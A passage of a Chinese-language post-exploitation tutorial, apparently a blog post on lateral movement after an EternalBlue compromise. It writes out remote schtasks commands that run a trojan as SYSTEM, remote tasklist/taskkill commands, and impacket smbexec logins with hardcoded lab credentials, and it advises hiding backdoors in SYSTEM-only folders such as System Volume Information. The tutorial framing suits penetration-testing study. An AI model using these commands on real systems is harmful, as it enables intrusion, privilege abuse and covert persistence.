主页 > 网络知识 > 从永恒之蓝看后渗透(2)

从永恒之蓝看后渗透(2)

然而在我们的PC>win7版本时,不再支持at命令,替代方案为schtasks:

#创建定时任务 schtasks /create /tn "test" /tr c: abbit.exe /sc once /st 10:02 /S 192.168.15.181 /RU System /u rabbitmask /p "1q2w3e4r!" #查看当前定时任务,如不加/tn test则查看全部 schtasks /Query /tn test /s 192.168.15.181 /u rabbitmask /p 1q2w3e4r! #删除掉刚刚增加的定时任务 schtasks /Delete /tn test /F /s 192.168.15.181 /u rabbitmask /p 1q2w3e4r! #参数解释 /create表示创建计划任务 /tn表示任务名 /tr指定运行的文件 /sc是任务运行频率 /st是执行时间 /s指定远程机器名或ip地址 /ru指定运行任务的用户权限,这里指定为最高的SYSTEM #查看远程目标进程列表: tasklist /s 192.168.15.180 /u rabbitmask /p 1q2w3e4r! #杀死pid为1000的进程 taskkill /s 192.168.15.180 /f /pid 1000 #杀死名为rabbit.exe的进程 taskkill /s 192.168.15.180 /f /im rabbit.exe 目录选择

为什么要单独拿出目录选择来说道下呢,我们来看个比较,首先是administrator权限看到的C盘根目录:

 

从永恒之蓝看后渗透

 

然后我们通过木马的提升的system权限看一下:

 

从永恒之蓝看后渗透

 

可以看到其中有几个目录是用户看不到的,包括administrator,只有system拥有访问权限,这里就是后门最佳的隐藏地点。

其中System Volume Information可写作system~1,不用担心空格等问题:

 

从永恒之蓝看后渗透

 

会话获取

既然已经创建完账号密码了,想直接执行命令的话ipc$其实并不太方便,我们直接smb登录目标。

为什么不用RDP?我也问过同样的问题,差点没被内网大佬喷死,有些场合RDP确实风险极大,与君共勉。

这里安利个python的第三方库impacket

项目地址:https://github.com/SecureAuthCorp/impacket

smbexec

其中有个打包好的工具smbexec,这里卖个关子,这里会用到,后边讲PTH也会用到。

python smbexec.py rabbitmask:1q2w3e4r!@192.168.15.181

 

从永恒之蓝看后渗透

 

这里我们已成功通过smb登录目标,且权限为system,因为它的原理是创建服务运行,即`sc`,权限为最高权限system,最后建议退出方式exit,否则可能有未知错误,尝试指定下共享路径。

python smbexec.py rabbitmask:1q2w3e4r!@192.168.15.181 -share admin$

这里插一句,共享路径是指的即逻辑共享(C$,D$,E$……)和系统目录(ADMIN$)共享,可通过net share了解:

 

从永恒之蓝看后渗透

 

wmiexec
说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!